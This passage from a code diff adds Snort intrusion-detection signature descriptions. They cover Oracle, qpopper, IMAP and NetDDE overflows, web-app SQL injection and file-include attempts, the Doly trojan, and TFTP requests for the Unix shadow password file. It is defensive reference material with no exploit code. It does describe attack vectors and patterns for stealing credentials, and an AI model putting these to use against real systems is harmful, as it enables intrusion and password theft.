+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2794.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2794
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_mview_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1442.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1442
+
+--
+Summary:
+This event is generated when a TFTP GET request is made for the "shadow" file.  This could be an indication that a remote attacker has compromised a system on the network and is transfering sensitive files back to the attacking system.
+
+--
+Impact:
+The "shadow" file normally stores encrypted password hashes and users names for Unix based systems.  If this file is being transfered over the network using TFTP it is normally an indication of a system compromise.
+
+In some situations this rule may only indicate a generic TFTP scan attempt, as the attacker may be scanning a large range of IP addresses for TFTP improperly configured TFTP servers.
+
+--
+Detailed Information:
+This rule searches for the filename "shadow" in TFTP GET requests.  The "shadow" file is used by Unix based systems to store encrypted password hases and users names for the system.
+
+--
+Attack Scenarios:
+After a successful system compromise an attacker may setup a tftp service to transfer files back to the attacking system.  Under this scenario these source address will point to the attack network and the destination address will be an address defined in the HOME_NET.
+
+Attackers may also scan large subnets for TFTP servers and make numerous generic GET request for common system files. 
+
+--
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large subnets for improperly configured TFTP servers.
+
+--
+False Positives:
+This rule was created to catch TFTP GET requests for "shadow", if this file name is being used during a legitimate TFTP session this rule will generate a false positive.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Depending on the situation blocking the attacker at the upstream router or firewall will eliminate the problem.  However, if the TFTP server is incorrectly configured and is actually serving the "shadow" file, it should be configured to only serve specific files from a safe directory.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+--
+Additional References
+None
+
+--
--- /dev/null
+++ b/doc/signatures/290.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 
+290
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow in Qualcomm qpopper. 
+
+--
+Impact: 
+Remote access.  This attack may permit the execution of arbitrary commands with the privileges of root on the vulernable server.
+
+--
+Detailed Information:
+A buffer overflow exploit exists in version 3.x of Qualcomm qpopper daemon, permitting the execution of arbitrary commands with the privileges of root.  The buffer overflow vulnerability is present because of improper bounds checking associated with vsprintf() and sprintf() calls in pop_msg.c.
+
+--
+Affected Systems:
+Qualcomm qpopper 3.0 b20
+Qualcomm qpopper 3.0
+
+--
+Attack Scenarios:
+An attacker may exploit the qpopper buffer overflow vulnerability, permitting the execution of arbitrary commands with the privileges of root on the vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to qpopper3.0b22
+
+--
+Contributors:
+Original rule writer unknown.
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0822
+
+Bugtraq
+http://www.securityfocus.com/bid/830
+
+--
--- /dev/null
+++ b/doc/signatures/296.txt
@@ -0,0 +1,61 @@
+SID:
+296
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd 
+server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead 
+to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55, 
+	University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+Simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this 
+problem
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/1175.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+Sid:
+1175
+
+--
+
+Summary:
+This event is generated when an attempt is made to access the
+wwwboard.pl web application on a web server.
+
+--
+Impact:
+Possible unauthorised remote administration of the webboard application.
+
+--
+Detailed Information:
+Some versions of WWWBoard, Matt Wright's CGI web application, have
+vulnerabities, including a default administration password for
+the web application, and a flaw in content checking for posts of followup
+messages that can allow an attacker to overwrite previous posts
+
+--
+Affected Systems:
+ Matt Wrights WWWBoard
+
+--
+Attack Scenarios:
+An attacker can gain control of the application by using the default
+username and password for the script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Normal, non-malicious accesses to wwwboard will generate events.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Do not use WWWBoard.
+
+Reconfigure the script to use a different administrator password.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2933.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2933
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2930.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2930
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1499.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1499
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1796.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1796
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "virgin".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "virgin".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website, or a site about olive oil. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000453.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000453
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "KAPhotoservice" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "apage" parameter in the "edtalbum.asp" script 
+used by the "KAPhotoservice" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using KAPhotoservice
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/111-3.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+111-3
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an IDS evasion attempt.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected a TCP session that contains
+a retransmission of data that has not already been acknowleged. This
+may be an attempt to evade any monitoring IDS.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker could supply two packets containing different data, one with
+a malicious payload destined for a vulnerable host and the other with a
+benign payload meant for the IDS. The second packet may disguise itself
+in the session as retransmitted data.
+
+-- 
+Ease of Attack: 
+Simple. Tools such as fragroute contain this functionality.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1970.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1970
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow in the Remote Data Services (RDS) component of Microsoft Data Access Components (MDAC).  
+
+--
+Impact:
+Remote Access.  If the exploit is successful, an attacker can gain remote access to the host.
+
+--
+Detailed Information:
+MDAC is a set of components that facilitates database access on Windows platforms.  The RDS component provides remote access to a database through Internet Information Services (IIS).  A vulnerability exists because of incorrect string handling with the RDS interface allowing an attacker to send a malformed HTTP request that overruns onto the heap.  This may allow execution of arbitrary code on the system. 
+
+--
+Affected Systems:
+Windows hosts running MDAC 2.1, 2.5, 2.6
+
+--
+Attack Scenarios:
+An attacker can send a malformed HTTP request that is improperly validated by RDS, subsequently causing a buffer overflow.
+
+--
+Ease of Attack:
+Difficult.  According to the Microsoft bulletin, a heap is more difficult to exploit than a stack overflow.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply security hotfix for Q329414.
+
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1142
+
+Foundstone
+http://www.foundstone.com/knowledge/randd-advisories-display.html?id=337
+
+Microsoft
+http://support.microsoft.com/default.aspx?scid=kb;en-us;Q329414
+
+--
--- /dev/null
+++ b/doc/signatures/100000774.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000774
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "category" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "category" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000373.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000373
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_user_ban.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_user_ban.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1985.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+1985
+
+--
+Summary:
+Doly is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine. Later versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry, Win.ini and System.ini. When first executed the Trojan replicates itself and in most cases, gives the copy a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+The Trojan changes system startup files and registry settings to add the Doly sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	119	Doly 2.0 access (outgoing TCP connection)
+	1985	Doly 1.5 server response (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
+	HKEY_LOCAL_MACHINE\Hardware\Data
+	HKEY_LOCAL_MACHINE\Hardware\Enum
+	HKEY_LOCAL_MACHINE\Software\Microsoft\DirectXMedia
+
+Registry keys added are:
+
+	HKEY_CLASSES_ROOT\.dl
+
+Removal of the replicant is also required, look for files ending in ".exe" or ".dll" in the <drive>:\Windows\ or <drive>:\Windows\System\ folders that use alphanumeric file names. The name of the replicant may be in one of the registry keys above.
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS312
+
+Hackfix
+http://www.hackfix.org/miscfix/doly.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/doly/index.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000470.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000470
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Foing" application running on a webserver. Access 
+to the file "manage_songs.php" using a remote file being passed as the 
+"foing_root_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "foing_root_path" parameter in the "manage_songs.php" 
+script used by the "Foing" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Foing
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2876.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2876
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_varchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2634.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2634
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "rectifier_diff.differences" and "rectifier_diff.rectify"
+procedures are used to find and resolve inconsistencies between
+two replicated sites. These procedures contain a programming error
+that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "sname1" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/3113.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3113
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/540.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 540
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
--- /dev/null
+++ b/doc/signatures/873.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+873
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
